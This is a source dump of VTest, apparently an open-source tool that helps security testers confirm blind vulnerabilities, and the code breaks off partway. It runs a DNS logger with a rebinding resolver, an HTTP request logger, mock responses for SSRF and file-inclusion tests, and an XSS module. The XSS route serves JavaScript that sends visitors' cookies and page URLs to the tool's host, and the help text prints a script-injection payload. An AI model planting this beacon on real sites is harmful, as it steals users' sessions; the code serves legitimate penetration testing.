├── .gitignore ├── DOMAIN.md ├── Dockerfile ├── LICENSE ├── README.md ├── docker-compose.yml ├── img ├── 2019-06-10-00-50-16.png ├── dns.png ├── httplog.png ├── mock.png └── xss.png ├── requirements.txt └── vtest.py /.gitignore: -------------------------------------------------------------------------------- 1 | /*.db 2 | .vscode/ -------------------------------------------------------------------------------- /DOMAIN.md: -------------------------------------------------------------------------------- 1 | ## 域名购买(只需一个域名即可) 2 | https://sg.godaddy.com/ 3 | 4 | 假设购买域名为: example.com 5 | 6 | 1. 添加A记录,子域名为ns,解析vps ip为 1.2.3.4 7 | 2. 添加NS记录,子域名为i,解析值为 ns.example.com 8 | 3. 再设置一个A记录,子域名为login,解析vps ip为 1.2.3.4 9 | 10 | 运行脚本: python vtest.py -d i.example.com -h 1.2.3.4 -p admin333 11 | 12 | 最终: 13 | 14 | 后台域名为: login.example.com 15 | 16 | 接收消息域名为: xxxx.i.example.com 17 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2.7 2 | 3 | ENV TZ=Asia/Shanghai 4 | 5 | RUN set -ex 6 | ENV DOMAIN vultest.com 7 | ENV LOCALIP 127.0.0.1 8 | # RUN apt-get update 9 | 10 | ADD requirements.txt /tmp/requirements.txt 11 | ADD vtest.py /app/vtest.py 12 | 13 | RUN pip install -r /tmp/requirements.txt 14 | RUN export PASSWORD=$(python2 -c "import random,string;print(''.join([random.choice(string.ascii_letters) for _ in range(32)]).encode());") 15 | 16 | CMD ["sh", "-c", "echo $DOMAIN $LOCALIP $PASSWORD && /usr/local/bin/python2 /app/vtest.py -d \"$DOMAIN\" -h \"$LOCALIP\" -p \"$PASSWORD\""] 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## VTest - 漏洞测试辅助系统 2 | 3 | 用于辅助安全工程师漏洞挖掘、测试、复现,集合了mock、httplog、dns tools、xss,可用于测试各类无回显、无法直观判断或特定场景下的漏洞,例如:存储型xss、ssrf、远程代码执行/注入、远程命令执行/注入、文件包含等。 4 | 5 | ### 项目特点 6 | 7 | - 使用方便,集成常用的辅助功能 8 | - 零部署难度,python环境中直接运行即可 9 | 10 | ### 功能介绍 11 | 12 | #### Mock 13 | 14 | 自定义http请求返回包,例如以下场景: 15 | 16 | - 定义返回内容为php代码,用于测试php远程文件包含漏洞 17 | 18 | - 定义301/302跳转,测试SSRF漏洞 19 | 20 | #### DNS Tools 21 | 22 | 用于辅助判断无法回显的漏洞以及特殊场景下的使用,有如下三种使用方式 23 | 24 | - `vultest.yourdomain.net`,任意多级的子域名解析均会记录显示,可用于各种无回显漏洞的判断、漏洞分析、数据回传 25 | - `10.100.11.22.yourdomain.net` 解析结果为 10.100.11.22,用于特殊的漏洞场景的利用(例如某个ssrf限制了域名且判断存在问题,用这个可以方便的遍历内网资源 )或限制测试 26 | - `66.123.11.11.10.100.11.22.yourdomain.com` 首次解析为66.123.11.11,第二次则解析为10.100.11.22,可用于DNS rebinding的漏洞测试 27 | 28 | #### HTTP Log 29 | 30 | 记录任意HTTP请求详细包,可用于各种无回显漏洞的判断、漏洞分析、信息收集、数据回传 31 | 32 | #### XSS 33 | 34 | 用于测试储存型xss漏洞 35 | 36 | 37 | #### API 38 | 新增api功能, 查询记录是否存在, 用于漏洞检测: 39 | 40 | - http://login.example.com/api/http?token=token&limit=1&offset=0&q=xxx 41 | - http://login.example.com/api/dns?token=token&limit=1&offset=0&q=xxx 42 | 43 | 返回结果: 44 | 45 | ``` 46 | {"rows":[{"domain":"1.1.1.2.i.example.com","insert_time":"2019-05-12 08:58:01","ip":"1.1.1.2"}],"status":"1"} 47 | ``` 48 | 49 | ### 系统部署 50 | 51 | Python2.7 环境 52 | 53 | ```shell 54 | # 安装依赖库 55 | pip install flask flask-httpauth 56 | # 参数说明: 57 | # -d 你的域名,需要指向ns记录到此服务器上,具体流程请看domain.md 58 | # -h 对外服务的IP,可不填,默认会自动获取外网IP 59 | # -p 系统登录密码,默认密码为admin,用户名固定为admin 60 | python vtest.py -d vultest.com -p admin333 61 | ``` 62 | 63 | 64 | ## IN DOCKER && DOCKER-COMPOSE 65 | 66 | run: 67 | 68 | ```shell 69 | DOMAIN=vtest.vultest.com LOCALIP=127.0.0.1 PASSWORD=admin333 docker-compose up -d 70 | ``` 71 | 72 | log: 73 | 74 | ![](img/2019-06-10-00-50-16.png) 75 | 76 | 77 | ### 界面图 78 | 79 | - Mock 80 | 81 | ![](img/mock.png) 82 | 83 | - DNS Tools 84 | 85 | ![](img/dns.png) 86 | 87 | - HTTP Log 88 | 89 | ![](img/httplog.png) 90 | 91 | - XSS 92 | 93 | ![](img/xss.png) 94 | 95 | ### 其他说明 96 | 本系统仅以记录日志和提供返回包自定义功能,辅助于开发和安全工程师进行相关判断,不存在也不会发起任何攻击请求。 97 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | # 4 | vtest: 5 | build: 6 | context: . 7 | dockerfile: Dockerfile 8 | environment: 9 | - DOMAIN=${DOMAIN} 10 | - LOCALIP=${LOCALIP} 11 | - PASSWORD=${PASSWORD} 12 | ports: 13 | - "80:80" 14 | - "53:53/udp" 15 | -------------------------------------------------------------------------------- /img/2019-06-10-00-50-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/opensec-cn/vtest/add5edfafc1c6bba7deb89610f866baf9045c656/img/2019-06-10-00-50-16.png -------------------------------------------------------------------------------- /img/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/opensec-cn/vtest/add5edfafc1c6bba7deb89610f866baf9045c656/img/dns.png -------------------------------------------------------------------------------- /img/httplog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/opensec-cn/vtest/add5edfafc1c6bba7deb89610f866baf9045c656/img/httplog.png -------------------------------------------------------------------------------- /img/mock.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/opensec-cn/vtest/add5edfafc1c6bba7deb89610f866baf9045c656/img/mock.png -------------------------------------------------------------------------------- /img/xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/opensec-cn/vtest/add5edfafc1c6bba7deb89610f866baf9045c656/img/xss.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | flask-httpauth -------------------------------------------------------------------------------- /vtest.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from flask import Flask, jsonify, request, redirect, url_for 3 | from flask_httpauth import HTTPBasicAuth 4 | from urllib import quote 5 | import SocketServer 6 | import struct 7 | import socket as socketlib 8 | import re 9 | import thread 10 | from datetime import datetime 11 | import json 12 | import sqlite3 13 | import socket 14 | import sys 15 | import getopt 16 | import hashlib 17 | 18 | app = Flask(__name__) 19 | auth = HTTPBasicAuth() 20 | ROOT_DOMAIN = '' 21 | DB = None 22 | REBIND_CACHE = [] 23 | LOCAL_IP = '' 24 | PASSWORD = 'admin' 25 | 26 | def md5(src): 27 | m2 = hashlib.md5() 28 | m2.update(src) 29 | return m2.hexdigest() 30 | 31 | def is_ip(ip): 32 | p = re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$') 33 | if p.match(ip): 34 | return ip 35 | else: 36 | return '3.3.3.3' 37 | 38 | API_TOKEN = md5("ded08972cead38d6ed8f485e5b65b4b6" + PASSWORD) 39 | 40 | HTML_TMEPLATE = ''' 41 | 42 | 43 | 44 | 45 | 46 | VTest - 漏洞测试辅助系统 47 | 48 | 49 | 50 | 51 | 52 | 149 | 150 | 151 | 152 |
153 | 160 |
161 |
162 |
163 |
164 |

使用帮助:
自定义http请求返回结果,方便漏洞测试 165 |
例如: 166 |
1.定义返回内容为php代码,用于测试php远程文件包含漏洞 167 |
2.定义301/302跳转,测试SSRF漏洞 168 |

169 | 170 |
171 | 172 |
173 |
174 |
175 |
176 |
177 |
178 |

使用帮助:
可用于辅助判断无法回显漏洞以及特殊场景下的使用 179 |
例如: 180 |
请确保{domain}域名NS指向部署运行此脚本的IP上 181 |
1.vultest.{domain},任意多级域名解析均会记录显示,可用于各种无回显漏洞的判断、漏洞分析、数据回传 182 |
2.10.100.11.22.{domain} 解析结果为 10.100.11.22,用于特殊的漏洞场景(例如某个ssrf限制了域名且判断存在问题,用这个可以方便的遍历内网资源) 183 |
3.66.123.11.11.10.100.11.22.{domain} 首次解析为66.123.11.11,第二次则解析为10.100.11.22,可用于DNS rebinding的漏洞测试 184 |

185 | 186 |
187 | 188 |
189 |
190 |
191 |
192 |
193 |
194 |

使用帮助:
可用于辅助判断无法回显漏洞以及特殊场景下的使用 195 |
例如: 196 |
1.http://httplog.{domain}/httplog/test,httplog和mock路由下的任意HTTP请求均会记录详细的请求包,可用于各种无回显漏洞的判断、漏洞分析、信息收集、数据回传 197 |
198 |

199 | 200 |
201 | 202 |
203 |
204 |
205 |
206 |
207 |
208 |

使用帮助:
用于测试储存型xss漏洞 209 |
JS地址:http://x.{domain}/xss/test/js test可自定义,用于项目区分
例如:'"/><script src=http://x.{domain}/xss/test/js></script> 210 |

211 | 212 |
213 | 214 |
215 |
216 |
217 |
218 |
219 |
220 |

使用帮助:
221 |
Token: {token} 222 |
http api: /api/http?token={token}&q=xxx 223 |
dns api: /api/dns?token={token}&q=xxx 224 |

225 |
226 | 227 |
228 |
229 |
230 |
231 | 232 | 267 | 268 | 269 | ''' 270 | 271 | 272 | @auth.verify_password 273 | def verify_pw(username, password): 274 | #print(username, password) 275 | if username == 'admin' and password == PASSWORD: 276 | return 'true' 277 | return None 278 | 279 | 280 | class sqlite: 281 | def __init__(self): 282 | self.conn = sqlite3.connect('vtest.db', check_same_thread=False) 283 | self._init_db() 284 | 285 | def _init_db(self): 286 | cursor = self.conn.cursor() 287 | cursor.execute(''' 288 | CREATE TABLE IF NOT EXISTS xss( 289 | id INTEGER PRIMARY KEY AUTOINCREMENT, 290 | name varchar(30) NOT NULL, 291 | source_ip varchar(20) NOT NULL, 292 | location text, 293 | toplocation text, 294 | opener text, 295 | cookie text, 296 | insert_time datetime 297 | ) 298 | ''') 299 | cursor.execute(''' 300 | CREATE TABLE IF NOT EXISTS mock( 301 | id INTEGER PRIMARY KEY AUTOINCREMENT, 302 | name varchar(254) NOT NULL, 303 | code integer, 304 | headers text, 305 | body text, 306 | insert_time datetime 307 | ) 308 | ''') 309 | cursor.execute(''' 310 | CREATE TABLE IF NOT EXISTS dns_log( 311 | id INTEGER PRIMARY KEY AUTOINCREMENT, 312 | name text, 313 | domain text, 314 | ip text, 315 | insert_time datetime 316 | ) 317 | ''') 318 | cursor.execute(''' 319 | CREATE TABLE IF NOT EXISTS http_log( 320 | id INTEGER PRIMARY KEY AUTOINCREMENT, 321 | url text, 322 | headers text, 323 | data text, 324 | ip text, 325 | insert_time datetime 326 | ) 327 | ''') 328 | cursor.close() 329 | self.conn.commit() 330 | 331 | def exec_sql(self, sql, *arg): 332 | # print sql 333 | result = [] 334 | cursor = self.conn.cursor() 335 | rows = cursor.execute(sql, arg) 336 | for v in rows: 337 | result.append(v) 338 | cursor.close() 339 | self.conn.commit() 340 | return result 341 | 342 | 343 | class DNSFrame: 344 | def __init__(self, data): 345 | (self.id, self.flags, self.quests, self.answers, self.author, 346 | self.addition) = struct.unpack('>HHHHHH', data[0:12]) 347 | self.query_type, self.query_name, self.query_bytes = self._get_query( 348 | data[12:]) 349 | self.answer_bytes = None 350 | 351 | def _get_query(self, data): 352 | i = 1 353 | name = '' 354 | while True: 355 | d = ord(data[i]) 356 | if d == 0: 357 | break 358 | if d < 32: 359 | name = name + '.' 360 | else: 361 | name = name + chr(d) 362 | i = i + 1 363 | query_bytes = data[0:i + 1] 364 | (_type, classify) = struct.unpack('>HH', data[i + 1:i + 5]) 365 | query_bytes += struct.pack('>HH', _type, classify) 366 | return _type, name, query_bytes 367 | 368 | def _get_answer_getbytes(self, ip): 369 | ttl = 0 370 | answer_bytes = struct.pack('>HHHLH', 49164, 1, 1, ttl, 4) 371 | s = ip.split('.') 372 | answer_bytes = answer_bytes + struct.pack('BBBB', int(s[0]), int(s[1]), 373 | int(s[2]), int(s[3])) 374 | return answer_bytes 375 | 376 | def get_query_domain(self): 377 | return self.query_name 378 | 379 | def setip(self, ip): 380 | self.answer_bytes = self._get_answer_getbytes(ip) 381 | 382 | def getbytes(self): 383 | res = struct.pack('>HHHHHH', self.id, 33152, self.quests, 1, 384 | self.author, self.addition) 385 | res += self.query_bytes + self.answer_bytes 386 | return res 387 | 388 | 389 | class DNSUDPHandler(SocketServer.BaseRequestHandler): 390 | def handle(self): 391 | data = self.request[0].strip() 392 | dns = DNSFrame(data) 393 | socket_u = self.request[1] 394 | a_map = DNSServer.A_map 395 | if (dns.query_type == 1): 396 | domain = dns.get_query_domain() 397 | 398 | ip = '1.1.1.1' 399 | pre_data = domain.replace('.' + ROOT_DOMAIN, '') 400 | 401 | if pre_data in a_map: 402 | # 自定义的dns记录,保留着 403 | ip = a_map[pre_data] 404 | elif pre_data.count('.') == 3: 405 | # 10.11.11.11.test.com 即解析为 10.11.11.11 406 | ip = is_ip(pre_data) 407 | elif pre_data.count('.') == 7: 408 | # 114.114.114.114.10.11.11.11.test.com 循环解析,例如第一次解析结果为114.114.114.114,第二次解析结果为10.11.11.11 409 | tmp = pre_data.split('.') 410 | ip_1 = '.'.join(tmp[0:4]) 411 | ip_2 = '.'.join(tmp[4:]) 412 | if tmp in REBIND_CACHE: 413 | ip = is_ip(ip_2) 414 | REBIND_CACHE.remove(tmp) 415 | else: 416 | REBIND_CACHE.append(tmp) 417 | ip = is_ip(ip_1) 418 | 419 | if ROOT_DOMAIN in domain: 420 | #name = domain.replace('.' + ROOT_DOMAIN, '') 421 | sql = "INSERT INTO dns_log (name,domain,ip,insert_time) \ 422 | VALUES(?, ?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))" 423 | 424 | DB.exec_sql(sql, pre_data, domain, ip) 425 | dns.setip(ip) 426 | print '%s: %s-->%s' % (self.client_address[0], pre_data, ip) 427 | socket_u.sendto(dns.getbytes(), self.client_address) 428 | else: 429 | socket_u.sendto(data, self.client_address) 430 | 431 | 432 | class DNSServer: 433 | def __init__(self): 434 | DNSServer.A_map = {} 435 | 436 | def add_record(self, name, ip): 437 | DNSServer.A_map[name] = ip 438 | 439 | def start(self): 440 | server = SocketServer.UDPServer(("0.0.0.0", 53), DNSUDPHandler) 441 | server.serve_forever() 442 | 443 | 444 | @app.route('/') 445 | @auth.login_required 446 | def index(): 447 | return HTML_TMEPLATE.replace('{domain}', ROOT_DOMAIN).replace('{token}', API_TOKEN), 200 448 | 449 | 450 | @app.route('/dns') 451 | @auth.login_required 452 | def dns_list(): 453 | result = [] 454 | total = 0 455 | args = request.values 456 | offset = int(args.get('offset', 0)) 457 | limit = int(args.get('limit', 10)) 458 | 459 | if args.get('search'): 460 | search = args.get('search') 461 | else: 462 | search = "" 463 | search = "%" + search + "%" 464 | 465 | sql = "SELECT domain,ip,insert_time FROM dns_log where domain like ? order by id desc limit ?,?" 466 | rows = DB.exec_sql(sql, search, offset, limit) 467 | 468 | for v in rows: 469 | result.append({"domain": v[0], "ip": v[1], "insert_time": v[2]}) 470 | sql = "SELECT COUNT(*) FROM dns_log" 471 | rows = DB.exec_sql(sql) 472 | total = rows[0][0] 473 | return jsonify({'total': int(total), 'rows': result}) 474 | 475 | 476 | @app.route('/httplog/', methods=['GET', 'POST', 'PUT']) 477 | def http_log(path): 478 | post_data = request.data 479 | if post_data == '': 480 | for k,v in request.form.items(): 481 | post_data += k +'=' + v + '&' 482 | post_data = post_data[:-1] 483 | args = [ 484 | request.url, 485 | json.dumps(dict(request.headers)), post_data, request.remote_addr 486 | ] 487 | print(request.url, post_data, request.remote_addr, dict( 488 | request.headers)) 489 | sql = "INSERT INTO http_log (url,headers,data,ip,insert_time) \ 490 | VALUES(?, ?, ?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))" 491 | 492 | DB.exec_sql(sql, *args) 493 | return 'success' 494 | 495 | 496 | @app.route('/httplog') 497 | @auth.login_required 498 | def http_log_list(): 499 | result = [] 500 | total = 0 501 | args = request.values 502 | offset = int(args.get('offset', 0)) 503 | limit = int(args.get('limit', 10)) 504 | sql = "SELECT url,headers,data,ip,insert_time FROM http_log order by id desc limit {skip},{limit}".format( 505 | skip=offset, limit=limit) 506 | rows = DB.exec_sql(sql) 507 | for v in rows: 508 | result.append({ 509 | 'url': v[0], 510 | 'headers': v[1], 511 | 'data': v[2], 512 | 'ip': v[3], 513 | 'insert_time': v[4] 514 | }) 515 | sql = "SELECT COUNT(*) FROM http_log" 516 | rows = DB.exec_sql(sql) 517 | total = rows[0][0] 518 | return jsonify({'total': int(total), 'rows': result}) 519 | 520 | 521 | @app.route('/mock', methods=['GET', 'POST']) 522 | @auth.login_required 523 | def mock_list(): 524 | if request.method == 'GET': 525 | result = [] 526 | total = 0 527 | args = request.values 528 | offset = int(args.get('offset', 0)) 529 | limit = int(args.get('limit', 10)) 530 | sql = "SELECT name,code,headers,body,insert_time FROM mock order by id desc limit {skip},{limit}".format( 531 | skip=offset, limit=limit) 532 | rows = DB.exec_sql(sql) 533 | for v in rows: 534 | result.append({ 535 | 'url': 536 | 'http://mock.{domain}/mock/{name}'.format( 537 | domain=ROOT_DOMAIN, name=v[0]), 538 | 'code': 539 | v[1], 540 | 'headers': 541 | v[2], 542 | 'body': 543 | v[3], 544 | 'insert_time': 545 | v[4] 546 | }) 547 | sql = "SELECT COUNT(*) FROM mock" 548 | rows = DB.exec_sql(sql) 549 | total = rows[0][0] 550 | return jsonify({'total': int(total), 'rows': result}) 551 | elif request.method == 'POST': 552 | # print('POST', request.form) 553 | args = request.form 554 | headers = {} 555 | headers_str = args.get('headers', '') 556 | if headers_str: 557 | for h in headers_str.split('\n'): 558 | k, v = h.split(':', 1) 559 | headers[k.strip()] = v.strip() 560 | args = [ 561 | args.get('name', 'test'), 562 | int(args.get('code', 200)), 563 | json.dumps(headers), 564 | args.get('body', '') 565 | ] 566 | sql = "INSERT INTO mock (name,code,headers,body,insert_time) \ 567 | VALUES(?, ?, ?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))" 568 | 569 | DB.exec_sql(sql, *args) 570 | return redirect(url_for('index')) 571 | 572 | 573 | @app.route('/mock/') 574 | def mock(name): 575 | print('GET', name) 576 | sql1 = "INSERT INTO http_log (url,headers,data,ip,insert_time) \ 577 | VALUES(?, ?, ?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))" 578 | 579 | DB.exec_sql(sql1, request.url, json.dumps(dict(request.headers)), 580 | request.data, request.remote_addr) 581 | sql = "SELECT code,headers,body FROM mock where name = ?" 582 | rows = DB.exec_sql(sql, name) 583 | if len(rows) >= 1: 584 | body = rows[0][2] 585 | headers = json.loads(rows[0][1]) 586 | return body, int(rows[0][0]), headers 587 | return 'null' 588 | 589 | 590 | @app.route('/xss//') 591 | def xss(name, action): 592 | callback_url = request.host_url + 'xss/' + quote(name) + '/save?l=' 593 | js_body = "(function(){(new Image()).src='" + callback_url + "'+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&t='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&c='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&o='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();" 594 | if action == 'js': 595 | return js_body 596 | elif action == 'save': 597 | args = request.values 598 | data = [ 599 | name, 600 | args.get('l', ''), 601 | args.get('t', ''), 602 | args.get('o', ''), 603 | args.get('c', ''), request.remote_addr 604 | ] 605 | sql = "INSERT INTO xss (name,location,toplocation,opener,cookie,source_ip,insert_time) \ 606 | VALUES(?, ?, ?, ? ,?, ?, datetime(CURRENT_TIMESTAMP,'localtime'))" 607 | 608 | DB.exec_sql(sql, *data) 609 | return 'success' 610 | 611 | 612 | @app.route('/xss') 613 | @auth.login_required 614 | def xss_list(): 615 | result = [] 616 | total = 0 617 | args = request.values 618 | offset = int(args.get('offset', 0)) 619 | limit = int(args.get('limit', 10)) 620 | sql = "SELECT name,location,toplocation,opener,cookie,source_ip,insert_time FROM xss order by id desc limit {skip},{limit}".format( 621 | skip=offset, limit=limit) 622 | rows = DB.exec_sql(sql) 623 | for v in rows: 624 | result.append({ 625 | 'name': v[0], 626 | 'location': v[1], 627 | 'other': v[2] + '\n' + v[3], 628 | 'cookie': v[4], 629 | 'source_ip': v[5], 630 | 'insert_time': v[6] 631 | }) 632 | sql = "SELECT COUNT(*) FROM xss" 633 | rows = DB.exec_sql(sql) 634 | total = rows[0][0] 635 | return jsonify({'total': int(total), 'rows': result}) 636 | 637 | @app.route('/del/') 638 | @auth.login_required 639 | def del_data(col): 640 | table = '' 641 | if col == 'http': 642 | table = 'http_log' 643 | elif col == 'dns': 644 | table = 'dns_log' 645 | elif col == 'xss': 646 | table = 'xss' 647 | else: 648 | return jsonify({'status': '0', 'msg': 'unkown table'}) 649 | 650 | sql = "Delete FROM {table}".format(table=table) 651 | DB.exec_sql(sql) 652 | 653 | return jsonify({'status':1}) 654 | 655 | @app.route('/api/') 656 | def api_check(action): 657 | args = request.values 658 | 659 | if not args.get('token') or args.get('token') != API_TOKEN: 660 | return jsonify({'status':'0', 'msg':'error token'}) 661 | 662 | offset = int(args.get('offset', 0)) 663 | limit = int(args.get('limit', 10)) 664 | query = args.get('q', '') 665 | query = "%" + query + "%" 666 | 667 | result = [] 668 | if action == 'dns': 669 | sql = "SELECT domain,ip,insert_time FROM dns_log where domain like ? order by id desc limit ?,?" 670 | rows = DB.exec_sql(sql, query, offset, limit) 671 | 672 | for v in rows: 673 | result.append({"domain": v[0], "ip": v[1], "insert_time": 